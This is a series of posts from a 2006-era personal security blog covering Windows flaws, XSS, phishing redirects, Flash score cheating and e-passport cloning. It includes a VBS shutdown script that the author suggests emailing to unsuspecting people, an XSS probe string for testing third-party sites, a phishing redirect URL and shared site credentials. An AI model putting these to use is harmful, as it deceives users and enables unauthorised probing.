Windows: Vulnerable by Design

I'm coming around one of my (and probably your) favorite subjects, Windows and Their Evil Nature. Talking about this OS and how it is so insecure is one hot topic. It's just I've never sat down to write a few pointers on the subject. And guess what! Tom Yager in InfoWorld has done it for me. Oh boy!! Anyway :P

Just a few quotes from the article...

• All Windows background processes/daemons are spawned from a single hyper-privileged process and referred to as services.

• By default, Windows launches all services with SYSTEM-level privileges.

What this means is that if an attacker finds a flaw in a Windows process and manages to inject code, it will be executed with SYSTEM privileges. Bad bad thing! Btw, do you know the average number of flaws/bugs per line of code? Google it and you'll be surprised with the answer.
Another thing I'd like to add is that all these high-priviledged services are running by default in any system. What this means? That all of us have more that a dozen running services which we will never need but at the same time pose a great security risk because of a potential exploit in them!

• Windows requires that users log in with administrative privileges to install software, which causes many to use privileged accounts for day-to-day usage.

This is so common that most of you think of it as standard. No! Using your computer with an administrator account is also a bad bad thing. Why? Because if malicious code is executed somehow in your account it will have admin rights and believe me a large (maybe the largest) portion of malcode needs these rights. You think you are smart enough? Think again. I am not talking about clicking .exe files sent to you over IRC. I am talking about XSS running javascript, remote code execution exploits and many more. Even a simple .bat written by some brat with cp and rm commands aiming to mess up your system. Unfortunately if you switch to a user-level account you will feel disabled most of the time. Well you shouldn't be.

I could talk about these things for days but I guess it's a good time to stop now, just for today. If you find these interesting go on and read the article.

Oh, Slackware >> Windows :P

Public Web Surfing

The New York Times has an article on safely using public networks (e.g. Wi-Fi hotspots) or public computers (e.g. at an internet cafe or airport). The author points out that most users leave too many traces behind them after using their computer in a public network or using a public computer. These traces may be from browser cookies to passwords and work documents.

It is true that most people are just computer users meaning they don't know and don't care about technical issues, including security. So someone is on the move, wants to check his/her e-mail or contact a friend, connects to a hot spot or visits an Internet cafe. In any case, malicious people could "snif" what he/she does and steal almost anything this user sends or receives.

Of course there are many things one can do to protect him/her self. Everything has to do with attitude: First of all more and more people have laptops so using a public computer is rare. Yet, if you ever need one, keep in mind that it's like talking on a public phone in the middle of a square. Would you yell your ATM PIN over the phone or your e-mail password? No! Hell, No! The same rule applies here. When typing in passwords *always* make sure you are using SSL. If not, just quit. The problem is someone could plant a keylogger in that public PC and collect tons of information. For that reason these PCs are restarted between different users and any specific user-specific programs or data are wipped out. But you can never be too safe so consider public PCs the last possible solution. When using your own laptop you are at least safe from malicious programs. Eavesdroppers do exist though. Check here too for SSL and don't even think about logging in otherwise.

Go ahead, check the article. The author tries to ring the bell to those who are totally unsuspected of the potential dangers but may end up scaring them into ineffective techniques which only offer the illusion of safety. Another point I disagree with is the listing of "security tips" like encryption software and VPN. As I've just said users who don't know how to deal with this stuff are likely to a) lock themselves out of important files b) use a VPN in such way that no protection is provided c) get tricked too easily.

To sum up, public web surfing is certainly a great service allowing you to talk, work, have fun while on the move but, as any public means of communication, should not carry sensitive information. If that is absolutely necessary, there are ways to ensure privacy. The thing is that Security Policies and Techniques for "Private Public Web Surfing" should be applied by trained professionals and not layed upon the hands of ignorant users.

P.S.: To read the article you'll be prompted for a username and a password. Since registration is free I don't see any point in this. I mean they restrict access to registered users but then again, anyone can register! So why not leave the access totally public? Anyway, use goaway147:goaway as username:password (thanks to bugmenot.com).

Google Redirection Hole used for Phishing

It's official. Google's redirection hole, formerly used for spam, is currently an excellent tool in the hands of phishers.

Why is this bad? Because 99% of Internet users trust google and when they see a link starting with "www.google.com" they think it's part of google or a site google knows about and has included it in its structure. WRONG!

What do I mean? Check this out...
http://www.google.com/url?q=http://66.207.71.141/signin.ebay.com/Members_Log-in.htm

This url (one line) starts with one of the most recognizable domains in the world but what comes next? An unverified IP address and after that the words "signin" and "ebay". Just for testing, try opening it with your browser. It's safe from javascript and stuff. It's just an example. Or try this: append a url of your choice next to "url?q=" and paste the entire thing in your browser. WoW.

This is a huge hole. Anyone can have google as his referrer to a malicious site. Just for the sake of it try entering the link from above (if you haven't done already). And open another tab in your browser with the real signin page from ebay.com. Can you tell the difference? An experienced (or suspicious) user might notice there is no SSL established in the fake page but that's something most victims don't even know about.

Oh and by the way this issue has been known for over six months :P

How To Write Unmaintainable Code

Following BOFH guidelines demands a little bit more than writting code without comments. In this must-have guide you will learn essential tips in making a code maintainer's life a living hell. It will also guarantee you a life-time contract at your job since no reasonable man will kick you out and except their software to keep running.

Next Gen Search: Photo ID Lookup

Every time you add a picture to your gmail contact's profile, you are asked to crop it to seperate the face from the body. So Google has, somewhere, a huge database with people's headshots tied with nicknames and other information. I wonder why...

Now hear this: Google was very close in acquiring Riya, a face recognition service which expanded into a visual search engine. The deal broke since Google decided to develop an in-house solution. This prooves their intentions in developing algorithms for processing and recognizing faces.

How about that? You enter google.com, search a name/nickname and download the guy's/gal's photo. Another scenario describes you taking a photo with your digital camera/cell phone, uploading it to the search engine and identify the displayed person. OMG. This is just huge. What's next? License plate identification?

Of course there are serious legal implications mainly from possible privacy violations.

To sum up, from a technological point of view this is very big (of course intelligence services have been using this thing for a decade now) but we should give it a good thought before launching it as it is. Besides, Google is already under suspicion because of its search engine (keeping user search entries) and its mailing service (filterning e-mail content to extract information). Finally, all this huge amount of data is becoming an invaluable source which is yet to be mined.

British Terror Alert by Hollywood Inc.

You must have already heard about the "terror alert" issued by British law enforcement authorities, followed by "imminent attack" countermeasures such as grounding all flights, strip searching all airport travellers and of course banning all liquids (including medicine, water and baby milk) from entering the flight cabin.

At that time, the brits claimed they had "intelligence" on a large-scale terrorist attack which involved mixing certain chemicals on board and causing explosions that could bring down an entire airplane.
Authorities were in true panic since the same "intel" stated that those chemicals could be found in every-day products such as cosmetics and cleaning products. So no liquids on board and if you absolutely had to, you were forced to taste them.

Since the beginning of this I trully believed they were at least overreacting if not playing some propaganda game. Now, The Register has an interesting, detailed article which prooves all these police claims wrong and concludes that this scenario could only be implemented by Hollywood producers in the land of fiction.

Cracking some, Securing others...

It seems that I am spending too much time and energy talking about stuff in other blogs that I don't take care of my own. Well, I'm not sure anyone else is reading this anyway so I guess it's cool :P


You VS Phishing

To begin with, here's an interesting post on managing security between producers and consumers. It is about Phishing and how it is certain that anything a user has to type in as authentication can be extracted from him/her one way or another. What security experts should be doing is stop trying to educate the users and start increasing security on the company's behalf. Social Engineering (that's what phishing really is) manipulates people and that is something we cannot deal with once and for all. And since we acknowledge that the weakest link is always the human, our efforts should focus on taking him out of the equation.


Yet Another XSS Issue

On the XSS frontier, according to this it is possible to enter specific ASCII characters in some web page which, when next to each other, form expressions or delimiters that can shape the code underneath. That way a user entry may place malicious code outside an tag but withing the realm of the HTML tag. This is so crazy my head is going to explode. No, it's not because I find it difficult to understand or anything. It's just that this stuff attack technologies like HyperText Media Language that are considered above suspicion and are widely used. Exploiting this automatically produces a number of victims equal to the Internet population.

So... let me get this straight, a problem so big that can affect the entire Internet but so obfuscated that cannot be seen and if seen cannot be realised. Everyday activites like opening HTML encoded e-mails or hitting a URL may expose the world to malicious attempts. And we are still sitting here?!


Smashing the Flash for Fun and Profit

Last night I was really bored so I decided to study a few flash games and find a way to cheat when submitting the score online. It really was easy. What most of these games do is send a POST to e.g. http://www.example.com/flashgames/game314/submit.asp?score=31400. If you manipulate that packet, changing score to 62800 and finally send it, you have successfully doubled your score! No verification, no nothing. Of course some games do a little checking to see if let's say 62800 is a plausible score (maybe it exceeds the maximum available points or sth). But that's also too easy to deal with.

You just have to decompile the file and take a good look at the source code which is ActionScript. To begin with, all flash games (.swf) are downloaded to your PC prior to execution so you have a copy of the title to look at. Secondly, since they are not compiled files but use an interpreted object-oriented language they contain bytecode (not machine code) which is executed at run time by your browser. That bytecode may be easily reversed using a decompiler (it actually doesn't de-compile but you get the picture). Finally ActionScript seems like pseudo-code, that is logical expressions describing the actual design of the game. These can be well-understood by humans, even non-programmers. To deal with these issues, protection methods are being used. These allow the game to be run but prevent a decompiler from taking it apart. But the truth is these protections aren't that good. They can be removed using freeware, google-found tools. Finally, ActionScript programmers use obfuscation techniques to protect their code (all other elements like graphics are left open to "borrow"). What they really do is piss somebody off since the code may be partly read using certain ways and ofcourse the code structure may always be studied using standard Hex Editors.

Since yesterday I've seen quite a few flash games with variable protection schemes. The hardest I've found used the hash of string containing the actual score plus some "secret" sequence of chars to make sure the submitted score had not been tampered with. This sequence was hard-coded in the game. I mean are they stupid or what? As I've already said, if someone is already skilled to discover the submitted values and crack the file, code obfuscation can do very little to him. So sooner or later the secret is revealed.

There's one golden rule in cryptography:
never rely on the secrecy of the algorithm.

Once the algorithm is revealed, your cover is blown. I could think of and suggest ways to improve verification issues and protect copyrights but that's not my job and I have better things to do :P


e-Shops revised

Almost two weeks ago I ordered a digital camera from a popular, computer/technology store which also operates online. The same day I received an e-mailing informing me that the specified product was out of the stock and urging me to contact an employee by phone. So I did. He claimed that a "bug" in their website showed the camera as available "withing 24 hours" while they had already filled an order from the manufactor some days before. OMG. Do you say the words "bug" followed by "website" and expect someone to shop from you again? Anyway, I made clear that no charges would be made until the product had been shipped to my location. Standard thing I guess, nothing to get excited about. Today, I called the store asking for a status on the order. "We received the items yesterday and they'll be shipped to you tomorrow". Am I missing something here? What happened to "today"? What are they going to do today? Or maybe my call was a wake-up for them to check on my account? So weekend is coming up and I'll get my package on Monday (hopefully).

Come on people! Is this the best you can do? It's the summer time and I'm a bit lazy. Had it been otherwise, I would have already canceled the order and bought the camera from somewhere else.

What these people don't seem to understand is that when you go online you are competing with the world. Thousands of e-Shops are available online providing low prices, high availability and excellent service.

Had it been otherwise, I would have already bought the camera from a country "next-door" like Germany or France. Using today's courier services I could have the product here in two days and at a price possibly lower that the one I get here.

In an open market my shopping mall extends around the world and those who stick to "standard" services won't make it through the year.

RRAS bug: How can they be so stupid?

If you are reading this then two things are happening: you're running a patched Windows system or you are not running a Windows system at all. Just in case you are not patched yet, get out of here! Now! Go update!

Well... to begin with let me tell you that this is also a big one. Maybe not as big as MS06-40 but it's big. It has to do with rasmans.dll, a library used by the Routing and Remote Access Service in Windows (2000, 2003, XP). Yet another stack overflow exploit due to the ability to write arbitary values in a registry key.

In detail: every time you call a certain function (RPC) from withing that library, which uses registry keys to store information, a new registry key replaces the current (old) one. The problem starts with the value of the key being unlimited. So you can put as much data as you want resulting in a stack overflow exploit. The exploit works by just calling once to set the key to a huge value, then calling the function again to have our huge value deleted, thus triggering the overflow.

How stupid can they be?

What is it with these people?

When releasing such services with a broad range of use it is unforgiving to overlook bugs like this. Or maybe they didn't check their code? I mean Remote Procedure Call, Dynamic Host Control Protocol, Routing and Remote Access, Server Service? These things are automatically deployed in a fresh Windows Intallation. The user is never asked whether to enable these modules or not. "Windows knows best". Also, one uses them because they make his life easier so what happens? Microsoft gives absolutely no control or knowledge over these issues leaving huge back doors (they couldn't do it better even if it was intentional).

If I don't know a certain service is active how could I take it into consideration when securing my system? And if Microsoft keeps that service hidden from me, should it take care of the security too?

Btw, Microsoft has released patch MS06-36 to address this issue but, as I'm told, the patched code still contains part of the vulnerability. Nice going guys :P

Windows Users: Switching to Defcon 1

Defcon stands for DEFence readiness CONditions and is a model reflecting the current state of alert. Defcon1 is the highest state indicating an imminent attack.

Security Experts all over the world expect a large scale attack against a Windows vulnerability at any moment. Microsoft has released a patch codenamed MS06-40 but there are too many users out there who don't care to download such security updates. This is so serious that the U.S. Department of Homeland Security issued an official warning. The DHS usually worries about terrorist attacks or extreme weather conditions (hurricanes, etc.). So if *they* are worried about this then *you* should be worried too. People compare the possible side effects of this to the MSBlast worm in 2003.

In detail, there's a stack overflow exploit in NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. The Server Service is a Windows NT 4.0, 2000 and XP service allowing users to share resources (files, printers etc. aka File and Printer Sharing) over a network. Using that exploit an attacker could successfuly write 370 bytes of code (payload).

Do you realise how big this is?

Do you know how many unpatched systems are out there?

Exploit code is already out taking advantage of this and causing a DoS attack to a system. Even a failed exploit attempt could result in a system restart.

It is a matter of time before someone turns the exploit code into a worm. This could be the next big thing to shock the Internet. If you still can't understand the potentials of this, shut down your PC - right now!

P.S.: As I've already mentioned a patch is available from Microsoft Windows Update. I suggest you update, if you haven't already done so.

Update: It's seems that I was left behind. Actually the first mass-exploit wave is happening right now. Attackers hijack unpatched Windows machines and use them in irc-controlled botnets. The attacks started on Sat 12 Aug 2006 and involve executing malicious code, using this exploit, install a trojan, modify security settings and connect to an irc server ready to receive commands. You will find here a detailed analysis of this tactic.

(VBS) Shutting Down Windows...

Here's some vbs code I wrote:

Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.Run "shutdown -s -t 120", 1, true
Set WSHShell = Nothing
WScript.Quit(0)

As you can see, it executes "shutdown -s -t 120" which tells Windows to terminate in 120 seconds.

To counter the effect (abort the shutdown) you may use:

Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.Run "shutdown -a", 1, true
Set WSHShell = Nothing
WScript.Quit(0)

Homework: Copy each of these pieces into a .txt file naming it exploit.vbs and csexploit.vbs (do NOT leave a trailing .txt and make sure .txt is not hidden from you by the OS). Now, double click on exploit.vbs and you will a window informing you that your system will shut down in less than 120 seconds. Quickly, double click on csexpoit.vbs to make that window disappear and ofcourse abort the process. Cool huh?

Try e-mailing this (actually the exploit.vbs file as an attachment) to your friends titled "check this out" or sth and you'll be surprised to find out how many of them actually clicked the file and faced the penalty :P
Your chances will greatly increase if the receiver of this is some bored, I-dont-know-computers secretary. How do you think so many worms have spread? Did you know that the majority of them was written in vbs?

Now... I should inform you that I could just as easily find code that let's say collects passwords from IE history or copies MSN Messenger identities and logs and have all this info mailed to me as soon as you click the file. Or maybe automatically e-mail the code to everyone in your address book. You should also fear that there have been cases in which you don't have to double click on the file. I could have it executed using a buffer overlow exploit in your Windows system. How about that?

Goodnight everyone!

TSF Deployed at Lebanon

A humanitarian group called Telecoms Sans Frontieres (TSF) is currently heading for Lebanon to establish emergency telecommunication infrastructure using satellite links, 802.11 nodes, laptops, faxes and mobile phones.

Deploying such wireless networks has been already tested and proved the best solution in such cases. The army and emergency response teams have been among the first to acquire such technology.

Who could argue now that WiFi is not reliable? In a country at war where all wired power and communication grids have been bombed, it seems that wireless communications will do the job.

I've already talked about this at Net Phones Services: Are We There Yet where I stressed out that Computer Network Phone Services could fully take over current wired models.

(debugging) XSS Locator

XSS, as in Cross Site Scripting, is one hot topic. I've already talked about it in Slow Down! I'm gettin' Dizzy. It has to do with Javascript exploits allowing a malicious user to direct orders to the webserver hosting a site and using it to hide exploit code that will be downloaded by unsuspected visitors. If that sounds too much and impossible to happen, let me inform you that the exploited server may be hosting amazon or ebay or paypal or any other online store/service managing user information.

This is the code (I've replaced '<' and '>' with '#' as my WYSIWYG kept interpreting it. LOL. You shouldn't feel safe even while reading this blog.):

';alert(String.fromCharCode(88,83,83))//\';
alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";
alert(String.fromCharCode(88,83,83))//>#/SCRIPT#
!--#SCRIPT#alert(String.fromCharCode(88,83,83))#/SCRIPT#=&{}

What it does is show an alert box on your browser with the message "XSS". Of course if that shows up while you are trying this code in a third-party website, well... it shouldn't have and you've just discovered a vulnerable location!

If you watch carefully you'll see that it puts itself outside any quotes used to store it as a string. E.g. a script that prompts you with "What is your name?" and expects an answer is a good candidate for testing.

In Detail, let's say you have:

var a = prompt("What is your name?","");

After the user entry, variable 'a' will be (using only the first part of the code to make it easy for someone to notice):

var a = '';alert(String.fromCharCode(88,83,83))//';

As you can see the second quote (right before the first semicolon) closes the string and puts the entire code (after alert) outside the script (so it is runnable). Next, there are some more tricks to fool techniques like using a slash to init variable 'a' so that a single quote won't damage the string etc. Finally the #script#code#/script# does the trick :P

This is just a small demonstration. Imagive that this is too simple compared to other exploit codes. Also, imagive that the code doesn't just pop up an alert box but commands the browser running the script to dump passwords to an e-mail address or send a POST/GET command somewhere else (therefore acting as a bot) or ... or ... the possibilities are endless.


P.S.: The exploit code is presented as four lines while it really is just one. I've split them for indentation reasons only. If you want to try it, put it back together. No spaces.

(blogiseverything) The Story Behind These Company Names

blogiseverything.com has a great article on the name origin for some of the top IT companies.

Did you know that Apache got its name from "A PAtCHy" due to the number of patches written and applied for NCSA's http daemon?

Or did you know that Hotmail was initialy written as "HoTMaiL" to promote the letters HTML, the scripted language used to write web pages?

Or even did you know that Oracle was the codename of a CIA (yes, spy stuff) project carried out by the company's founders?

Well, you'll find a lot of these including Intel, Adobe, Cisco, Google, Microsoft, Motorola, Red Hat, Xerox and Yahoo. You're just one click away :P

No Room Today

Baltimore Sun has an exclusive story titled "NSA risking electrical overload". It basically says that the NSA HeadQuarters has problems when installing a new computer grid because of its needs in power. Baltimore's power grid is dangerously becoming insufficient for NSA's needs. The situation is fragile. As a result, they have elevated the building's temperature by two degrees in order to save electricity. I bet they also monitor big projects in the city like a new mall to make sure the grid doesn't fail under high demand. The implications of a power failure may be worse that those expected by the Y2K bug, according to a slashdot columnist. So what then? Build a Nuclear Plant? And in another 5 years? Build another one? And another one?

This has reminded me a talk with a collegue of mine about Google. He had said to me that the Google main facility was to its limits in terms of space. "They can't add any more computers in their grid". Of course there are Farms all around the globe caching and splitting the total load of requests but what these farms do is mirror the original grid in California. "They isn't any room left even for a tech guy to walk in there and change a burned CPU". It was amazing. He also claimed Google had an overheating problem. Too many machines in a limited space produce so much heat that the equipment itself is a risk. According to him, they had brought experts on air flow and cooling to come up with a solution. Bottomline, it is a deadlock. All computers must be in one place, one building, one room and there isn't any room left. They could start building a second huge facility but how whould they move out the computers? And how much would that take?

As you can see both NSA and Google face similar problems. Too many computers in one place. The first has power shortage problems, the second heat emission ones. This kind of facility has no future.

I am currently studying Distributed Computer Systems, that is having many computers working as one, sharing big loads of data and/or processing demands over a network. The systems don't have to be physicaly next to each other or in the same room, city, country or continent :P

You may have heard some big DCS projects like @Home (SETI, Folding, etc). These projects put to use the idle CPU time from millions of computers around the globe to examine data that would otherwise take years to produce results. They form huge supercomputers that will never fail (even if a computer or group of computers is down the grid will go on) and won't be limited by physical resources (space, power, air). A computer may be added to this grid at run time and may be as easily removed.

DCS is a thought out of the box. Maybe too smart for those corporate suites?

Anyhow, it's about time they change strategy and start planning right now and then, maybe in a decade or so, they'll make the transition. Else, they won't be able to stay on the feet.

Slow Down! I'm gettin' dizzy

I was just reading some guy's blog on security. He was talking about JavaScript Malware and how one could not only collect so much info from a website visitor, running a malicious script, but also launch entire attacks entering DMZs and exploiting vulnerabilities deep inside a secure network.

I'm just beginning to learn javascript but I am able to understand that what this guy is talking about is possible. Like let's do it today possible. And it occured to me: forget the security experts, forget the guys in dirty jeans attending BlackHat or Defcon. How many internet users are aware of malicious javascripts? Or Cross Site Scritping? How many super-duper administrators?

Here's a simple example based on a scenario from the above blog. Some guy works as a low level programmer or tech support or sth. Nobody pays much attention to him. His job is as simple as writting Installers or changing backup tapes and ink cartridges. The company's network is secure with super firewalls, VLANs etc. That guy, while bored, enters a CSS vulnerable site let's say MySpace. The attacker has put there a script which is downloaded once the website loads. That's it! The employee didn't see anything strange happening. He continues surfing around while that malicious script is running in the background collecting information about his computer, the network topology, previous network destinations, cached information, passwords etc. That same script may contain exploit code targeting well protected, private network equipment. Boom! How about that?

It may have already happened. Even to you. Homework: Download noScript Extension for Firefox. And surf your favorite sites. Every time a javascript is about to run, noScript blocks it and informs you about it. You'll be surprised to find out how many scripts are running while you are casually visiting a forum or a news site.

All this has a point. 90% of the people I know feel threated by viruses on floppy disks or kidz trying to steal their credit card info. Such an illusion. Somebody may already have hijacked their PC to assemble a botnet and they'll still be running their Antivirus once a week scanning for boot sector viruses :P

Right now technology is a big vector. The majority of people are stuck at the tail and few are shapping things at the head. Unfortunately there's a huge gap in the middle.

This very moment vulnerabilities are being found, exploits are designed and by tomorrow these people will own the world. Can YOU keep up?

(Black Hat) Cloning E-Passports Accomplished

A german computer security consultant has demonstrated the cloning of the electronic data from an E-Passport at the BlackHat convention, Las Vegas.

By the end of this year, many countries, including the U.S., Germany and Greece, will start issuing these Passports which contain an RFID (radio frequency ID) with the owners information on it. That way, they aim to make forgery a lot harder. Apparently they didn't do a great job planning this thing.

Wired News has published a very interesting article on the subject, which includes a demonstration by the guy who cracked it, Lukas Grunwald. In there, the reader will find out that the information on the chip is totally unencrypted (securely signed though) and therefore can be read and copied quite easily. Also, a worrying scenario states that an explosive device with an RFID sensor may identify a person by his E-Passport, while he is passing by, and activate. Finally, the author describes how a valid E-Passport could be overwritten so that let's say a known terrorist will go through border control uninterrupted.

You may also find an interesting video from Mahaffey and John Hering of Flexilis, security company, demonstrating the failure of the E-Passport's shielding system to prevent unauthorized scans of the RFID from malicious antennas.

I would like to quote something from the article:

Is this what the best and the brightest of the world could come up with? Or is this what happens when you do policy laundering and you get a bunch of bureaucrats making decisions about technologies they don't understand?

Which reminds me of my own blog entry titled "Exclude illiterate supervisors from e-Hierarchy?"

P.S.: Happy 3/8/6 (x86 day!)

x86 Days

Somebody pointed out to me the obvious:
today, tomorrow and the day after will be 2/8/6, 3/8/6 and 4/8/6 like 286, 386 and 486. Cool!

Windows: Give up control for a little temporary utility?

Microsoft Windows came into our lives introducing a revolutionary, user-friendly graphical user interface with the PC. From the start, Microsoft's goal was for every house to have a Windows PC. And they have succeeded in that using agressive marketing, disputed monopoly tactics, etc.

Right now, they (Microsoft) hold a huge piece of the pie and therefore great power. At first, user-friendly ment a mouse, nice colors and a few tooltips. After that, users didn't want their OS to crash (randomly) causing them to lose their unsaved work. So system stability and reliability came into play. Up to that point (let's say Windows 2000) users and Microsoft agreed on what the one side needed and what the other side was offering.

By the time Windows XP was on the market, something changed. Security. What had happened was that the home-OS had made its way in corporate networks interconnected to the Internet. So a few skilled people (hackers) found out several flaws that allowed them to siege control of these networks. Effects? Denial of Service, Lost Information, Leaked Information, Millions of Dollars in loss. While the home user wanted a plug and play system, the company employee demanded an invulnerable system.

So the situation was like this: an operating system with insufficient design for today's standards, problematic to the advanced user and a security risk for who had something to insure. This enforced a change of policy (or if you prefer, took user-friendliness to the next level).

While, up to this point, the user had been the absolute administrator of his system, now, the operating system took the role of protecting the system even from the user's actions if those posed hazard.

Today we hear about various Vista features such us scalable user rights (no more admin accounts available), something Unix had since the beginning, global undelete, abstraction layers for system control etc. All these things may be well-intended but take the keyboard out the user's hands. That's ok if you're just a beginniner and, for that matter, find tooltips and wizards very smart and helpful. But if you know what you want to do and how you want to do it, there's a great change Windows won't let you. So the OS keeps the system secure, right? Wrong! What it does is preserve the system its own way. There may be an attempt to secure it but when the first flaw comes up (there'll always be flaws in the software) you'll be helpless waiting for Microsoft to release a patch. That's not the way I want to work. That's not the way you want to work either. Patching an OS again and again makes it less reliable and much slower. It's not a rare thing for a patch to create a new bug in the system. And all that is done "transparently" through "smart abstraction" which don't "worry" me with technical information. Well maybe I want to be worried when it comes to my own PC. Maybe I want to be kept on alert if there's a reason to.

Would you buy a house with an unknown, invisible, integrated alarm system? So why would you buy an OS which acts the same way? What is more, you have payed pretty expensively for that piece of software!

Bottomline is: Windows was a great idea. Something has gone wrong with the implementation and action must be taked so that we have another version five years from now.